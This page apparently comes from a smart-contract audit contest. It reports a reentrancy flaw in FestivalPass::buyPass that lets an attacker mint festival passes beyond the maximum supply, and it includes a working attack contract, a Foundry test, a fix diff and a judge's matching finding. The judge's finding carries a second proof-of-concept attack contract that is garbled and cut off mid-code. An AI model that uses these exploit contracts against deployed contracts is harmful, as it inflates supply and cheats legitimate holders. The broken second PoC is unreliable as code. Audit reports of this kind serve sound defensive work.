Beatland Festival

AI First Flight #4

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: medium

Valid

Reentrancy vulnerability in `FestivalPass::buyPass` function allows for minting more passes than the specified max supply

lukamm

Reentrancy vulnerability in FestivalPass::buyPass function allows for minting more passes than the specified max supply

Description

The FestivalPass::buyPass does not follow the recommended CEI (Check, Effects, Interactions) pattern, and updates the passSupply state after minting the pass to the function caller.

function buyPass(uint256 collectionId) external payable {

// Must be valid pass ID (1 or 2 or 3)

require(

collectionId == GENERAL_PASS || collectionId == VIP_PASS || collectionId == BACKSTAGE_PASS,

"Invalid pass ID"

);

// Check payment and supply

require(msg.value == passPrice[collectionId], "Incorrect payment amount");

require(passSupply[collectionId] < passMaxSupply[collectionId], "Max supply reached");

// Mint 1 pass to buyer

@> _mint(msg.sender, collectionId, 1, "");

@> ++passSupply[collectionId];

// VIP gets 5 BEAT welcome bonus BACKSTAGE gets 15 BEAT welcome bonus

uint256 bonus = (collectionId == VIP_PASS) ? 5e18 : (collectionId == BACKSTAGE_PASS) ? 15e18 : 0;

if (bonus > 0) {

// Mint BEAT tokens to buyer

BeatToken(beatToken).mint(msg.sender, bonus);

}

emit PassPurchased(msg.sender, collectionId);

}

Risk

Likelihood:

This will occur when a malicious user uses an attack contract to repeatedly re enter the FestivalPass::buyPass function and mint more passes than the set max supply.

Impact:

A user can mint more passes than the specified max supply for any given pass type. For the backstage pass that is meant to be limited and only 100 supply, if more passes are minted this undermines the pass value proposition and harms legitiamte holders.

Proof of Concept

A user creates a malicious contract
They call fund the malicious contract with ETH to make the buyPass calls
They call and attack function, which calls buyPass and mints an ERC1115
This then hits the onERC1155Received in the attack contract and repeatedly calls buyPass until the attack contract is out of ETH

Add the following test to your FestivalPass.t.sol file

function testBuyPassReentrancy() public {

ReentrancyAttack attackContract = new ReentrancyAttack(festivalPass, beatToken);

address attacker = makeAddr("attacker");

vm.deal(attacker, BACKSTAGE_PRICE);

vm.deal(address(attackContract), BACKSTAGE_PRICE * BACKSTAGE_MAX_SUPPLY);

vm.prank(attacker);

attackContract.attack{value: BACKSTAGE_PRICE}();

assertGt(festivalPass.passSupply(3), BACKSTAGE_MAX_SUPPLY);

}

And this contract

contract ReentrancyAttack is IERC1155Receiver {

FestivalPass public festivalPass;

BeatToken public beatToken;

uint256 public constant BACKSTAGE_PRICE = 0.25 ether;

constructor(FestivalPass _festivalPass, BeatToken _beatToken) {

festivalPass = _festivalPass;

beatToken = _beatToken;

}

function attack() public payable {

festivalPass.buyPass{value: BACKSTAGE_PRICE}(3);

}

function onERC1155Received(address operator, address from, uint256 id, uint256 value, bytes calldata data)

external

returns (bytes4)

{

if (address(this).balance >= BACKSTAGE_PRICE) {

festivalPass.buyPass{value: BACKSTAGE_PRICE}(3);

}

return IERC1155Receiver.onERC1155Received.selector;

}

function onERC1155BatchReceived(address, address, uint256[] calldata, uint256[] calldata, bytes calldata)

external

pure

returns (bytes4)

{

return IERC1155Receiver.onERC1155BatchReceived.selector;

}

function supportsInterface(bytes4 interfaceId) external pure returns (bool) {

return interfaceId == type(IERC1155Receiver).interfaceId;

}

receive() external payable {}

}

Recommended Mitigation

The recommended mitigation is to follow the CEI (Checks, Effects, Interactions) pattern.

function buyPass(uint256 collectionId) external payable {

// Must be valid pass ID (1 or 2 or 3)

require(

collectionId == GENERAL_PASS || collectionId == VIP_PASS || collectionId == BACKSTAGE_PASS,

"Invalid pass ID"

);

// Check payment and supply

require(msg.value == passPrice[collectionId], "Incorrect payment amount");

require(passSupply[collectionId] < passMaxSupply[collectionId], "Max supply reached");

// Mint 1 pass to buyer

- _mint(msg.sender, collectionId, 1, "");

++passSupply[collectionId];

+ _mint(msg.sender, collectionId, 1, "");

// VIP gets 5 BEAT welcome bonus BACKSTAGE gets 15 BEAT welcome bonus

uint256 bonus = (collectionId == VIP_PASS) ? 5e18 : (collectionId == BACKSTAGE_PASS) ? 15e18 : 0;

if (bonus > 0) {

// Mint BEAT tokens to buyer

BeatToken(beatToken).mint(msg.sender, bonus);

}

emit PassPurchased(msg.sender, collectionId);

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 22 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[M-02] Function `FestivalPass:buyPass` Lacks Defense Against Reentrancy Attacks, Leading to Exceeding the Maximum NFT Pass Supply

# Function `FestivalPass:buyPass` Lacks Defense Against Reentrancy Attacks, Leading to Exceeding the Maximum NFT Pass Supply ## Description * Under normal circumstances, the system should control the supply of tokens or resources to ensure that it does not exceed a predefined maximum limit. This helps maintain system stability, security, and predictable behavior. * The function `FestivalPass:buyPass` does not follow the **Checks-Effects-Interactions** pattern. If a user uses a malicious contract as their account and includes reentrancy logic, they can bypass the maximum supply limit. ```solidity function buyPass(uint256 collectionId) external payable { // Must be valid pass ID (1 or 2 or 3) require(collectionId == GENERAL_PASS || collectionId == VIP_PASS || collectionId == BACKSTAGE_PASS, "Invalid pass ID"); // Check payment and supply require(msg.value == passPrice[collectionId], "Incorrect payment amount"); require(passSupply[collectionId] < passMaxSupply[collectionId], "Max supply reached"); // Mint 1 pass to buyer @> _mint(msg.sender, collectionId, 1, ""); // question: potential reentrancy? ++passSupply[collectionId]; // VIP gets 5 BEAT welcome bonus, BACKSTAGE gets 15 BEAT welcome bonus uint256 bonus = (collectionId == VIP_PASS) ? 5e18 : (collectionId == BACKSTAGE_PASS) ? 15e18 : 0; if (bonus > 0) { // Mint BEAT tokens to buyer BeatToken(beatToken).mint(msg.sender, bonus); } emit PassPurchased(msg.sender, collectionId); } ``` ## Risk **Likelihood**: * If a user uses a contract wallet with reentrancy logic, they can trigger multiple malicious calls during the execution of the `_mint` function. **Impact**: * Although the attacker still pays for each purchase, the total number of minted NFTs will exceed the intended maximum supply. This can lead to supply inflation and user dissatisfaction. ## Proof of Concept ````Solidity //SPDX-License-Identifier: MIT pragma solidity 0.8.25; import "@openzeppelin/contracts/token/ERC1155/IERC1155Receiver.sol"; import "../src/FestivalPass.sol"; import "./FestivalPass.t.sol"; import {console} from "forge-std/Test.sol"; contract AttackBuyPass{ address immutable onlyOnwer; FestivalPassTest immutable festivalPassTest; FestivalPass immutable festivalPass; uint256 immutable collectionId; uint256 immutable configPassPrice; uint256 immutable configPassMaxSupply; uint256 hackMintCount = 0; constructor(FestivalPassTest _festivalPassTest, FestivalPass _festivalPass, uint256 _collectionId, uint256 _configPassPrice, uint256 _configPassMaxSupply) payable { onlyOnwer = msg.sender; festivalPassTest = _festivalPassTest; festivalPass = _festivalPass; collectionId = _collectionId; configPassPrice = _configPassPrice; configPassMaxSupply = _configPassMaxSupply; hackMintCount = 1; } receive() external payable {} fallback() external payable {} function DoAttackBuyPass() public { require(msg.sender == onlyOnwer, "AttackBuyPass: msg.sender != onlyOnwer"); // This attack can only bypass the "maximum supply" restriction. festivalPass.buyPass{value: configPassPrice}(collectionId); } function onERC1155Received( address operator, address from, uint256 id, uint256 value, bytes calldata data ) external returns (bytes4){ if (hackMintCount festivalPass.passMaxSupply(targetPassId)); } } ``` ```` ## Recommended Mitigation * Refactor the function `FestivalPass:buyPass` to follow the **Checks-Effects-Interactions** principle. ```diff function buyPass(uint256 collectionId) external payable { // Must be valid pass ID (1 or 2 or 3) require(collectionId == GENERAL_PASS || collectionId == VIP_PASS || collectionId == BACKSTAGE_PASS, "Invalid pass ID"); // Check payment and supply require(msg.value == passPrice[collectionId], "Incorrect payment amount"); require(passSupply[collectionId] < passMaxSupply[collectionId], "Max supply reached"); // Mint 1 pass to buyer - _mint(msg.sender, collectionId, 1, ""); ++passSupply[collectionId]; + emit PassPurchased(msg.sender, collectionId); + _mint(msg.sender, collectionId, 1, ""); // VIP gets 5 BEAT welcome bonus, BACKSTAGE gets 15 BEAT welcome bonus uint256 bonus = (collectionId == VIP_PASS) ? 5e18 : (collectionId == BACKSTAGE_PASS) ? 15e18 : 0; if (bonus > 0) { // Mint BEAT tokens to buyer BeatToken(beatToken).mint(msg.sender, bonus); } - emit PassPurchased(msg.sender, collectionId); } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!